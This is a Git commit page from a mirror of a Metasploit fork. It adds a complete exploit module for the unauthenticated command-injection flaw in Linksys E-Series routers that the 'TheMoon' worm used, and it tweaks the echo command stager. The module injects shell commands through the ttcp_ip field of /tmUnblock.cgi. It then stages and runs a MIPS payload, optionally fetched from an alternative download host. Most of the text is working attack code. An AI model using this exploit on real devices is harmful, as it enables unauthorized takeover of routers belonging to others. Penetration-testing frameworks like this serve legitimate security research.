adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

a first try of the cmd stager, wget in a seperated module included

Browse Source
This commit is contained in:
Michael Messner
2014-02-23 20:59:17 +01:00
parent 3a8de6e124
commit dbbd080fc1
3 changed files with 127 additions and 1 deletions
Download Patch File Download Diff File Expand all files Collapse all files
lib/rex/exploitation/cmdstager/echo.rb
+2 -1
View File
@@ -103,7 +103,8 @@ class CmdStagerEcho < CmdStagerBase
def generate_cmds_decoder(opts)
cmds = []
# Make it all happen
cmds << "chmod +x #{@tempdir}#{@var_elf}"
cmds << "chmod 777 #{@tempdir}#{@var_elf}"
#cmds << "chmod +x #{@tempdir}#{@var_elf}"
cmds << "#{@tempdir}#{@var_elf}"
# Clean up after unless requested not to..
modules/exploits/linux/http/linksys_themoon_exec_echo.rb
+125
View File
@@ -0,0 +1,125 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::FileDropper
include Msf::Exploit::CmdStagerEcho
def initialize(info = {})
super(update_info(info,
'Name' => 'Linksys E-Series TheMoon Remote Command Injection',
'Description' => %q{
Some Linksys E-Series Routers are vulnerable to an unauthenticated OS command
injection. This vulnerability was used from the so called "TheMoon" worm. There
are many Systems that might be vulnerable:
E4200, E3200, E3000, E2500, E2100L, E2000, E1550, E1500, E1200, E1000, E900. This
module was tested against a E1500 v1.0.5.
},
'Author' =>
[
'Johannes Ullrich', #worm discovery
'Rew', # original exploit
'infodox', # another exploit
'Michael Messner <devnull@s3cur1ty.de>', # Metasploit module
'juan vazquez' # minor help with msf module
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'EDB', '31683' ],
[ 'URL', 'http://packetstormsecurity.com/files/125253/linksyseseries-exec.txt' ],
[ 'URL', 'http://packetstormsecurity.com/files/125252/Linksys-Worm-Remote-Root.html' ],
[ 'URL', 'https://isc.sans.edu/diary/Linksys+Worm+%22TheMoon%22+Summary%3A+What+we+know+so+far/17633' ]
],
'DisclosureDate' => 'Feb 13 2014',
'Privileged' => true,
'Platform' => %w{ linux unix },
'Payload' =>
{
'DisableNops' => true
},
'Targets' =>
[
[ 'CMD',
{
'Arch' => ARCH_CMD,
'Platform' => 'unix'
}
],
[ 'Linux mipsel Payload',
{
'Arch' => ARCH_MIPSLE,
'Platform' => 'linux'
}
],
],
'DefaultTarget' => 1
))
register_options(
[
OptAddress.new('DOWNHOST', [ false, 'An alternative host to request the MIPS payload from' ]),
OptString.new('DOWNFILE', [ false, 'Filename to download, (default: random)' ]),
OptInt.new('HTTP_DELAY', [true, 'Time that the HTTP Server will wait for the ELF payload request', 60])
], self.class)
end
def execute_command(cmd, opts)
uri = '/tmUnblock.cgi'
begin
res = send_request_cgi({
'uri' => uri,
'method' => 'POST',
'encode_params' => false,
'vars_post' => {
"submit_button" => "",
"change_action" => "",
"action" => "",
"commit" => "0",
"ttcp_num" => "2",
"ttcp_size" => "2",
"ttcp_ip" => "-h `#{cmd}`",
"StartEPI" => "1"
}
})
return res
rescue ::Rex::ConnectionError
vprint_error("#{peer} - Failed to connect to the web server")
return nil
end
end
def exploit
uri = '/tmUnblock.cgi'
print_status("#{peer} - Trying to access the vulnerable url")
begin
res = send_request_cgi({
'uri' => uri,
'method' => 'GET',
})
if res.nil? or res.code == 404
fail_with(Failure::NoAccess, "#{peer} - Access to the vulnerable URL is not possible")
end
if [200, 301, 302].include?(res.code)
print_good("#{peer} - Successfully accessed #{uri}")
else
fail_with(Failure::NoAccess, "#{peer} - Access to the vulnerable URL is not possible")
end
rescue ::Rex::ConnectionError
fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
end
execute_cmdstager(
:linemax => 26
)
end
end
modules/exploits/linux/http/linksys_themoon_exec.rb → modules/exploits/linux/http/linksys_themoon_exec_wget.rb
View File